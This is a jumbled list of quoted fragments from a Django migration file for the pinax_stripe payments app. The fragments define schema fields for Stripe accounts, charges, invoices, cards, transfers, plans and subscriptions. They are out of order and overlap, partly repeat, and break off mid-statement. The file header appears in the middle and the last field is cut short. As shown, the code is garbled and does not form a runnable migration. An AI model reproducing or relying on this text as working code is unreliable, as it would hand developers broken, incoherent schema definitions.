models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True,", "on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ),", "models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True,", "('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True,", "('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract':", "null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={", "models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField(", "models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ],", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country',", "('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False,", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id',", "models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True,", "('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)),", "null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency',", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge',", "models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True,", "('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start',", "utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__ import", "models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type',", "), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency',", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True,", "bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at',", "('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()),", "to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id',", "null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False,", "'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "django.db import migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)),", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2,", "[ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)),", "null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)),", "max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)),", "models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded',", "migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2,", "models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata',", "migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')),", "null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded',", "('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True,", "null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by',", "null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True,", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()),", "options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id',", "('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)),", "models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address',", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)),", "options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32,", "2018-08-06 19:00 from __future__ import unicode_literals from decimal import Decimal from django.conf import", "('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2',", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state',", "models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True,", "('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract':", "models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)),", "related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly',", "null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event',", "), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer',", "models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created',", "Decimal from django.conf import settings from django.db import migrations, models import django.db.models.deletion import", "null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)),", "('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome',", "('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid',", "null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)),", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)),", "models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at',", "null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date',", "models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True,", "jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)),", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, },", "models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, },", "to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32,", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)),", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid',", "('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "}, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True,", "related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),", "('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account',", "models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name',", "('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()),", "('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)),", "('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)),", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True,", "('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state',", "('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True,", "models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)),", "models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True,", "models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()),", "('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details',", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ),", "models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)),", "('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)),", "], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription',", "models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction',", "null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, },", "models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start',", "models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE,", "to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ),", "('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True,", "'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False,", "to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)),", "models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ],", "('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True,", "name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)),", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice',", "('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances',", "('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True,", "('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1',", "('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id',", "('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', 